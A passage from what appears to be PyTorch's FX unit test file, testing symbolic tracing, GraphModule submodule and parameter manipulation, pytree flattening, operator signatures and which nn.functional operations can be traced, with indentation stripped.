self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFunctionalTracing(JitTestCase):
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
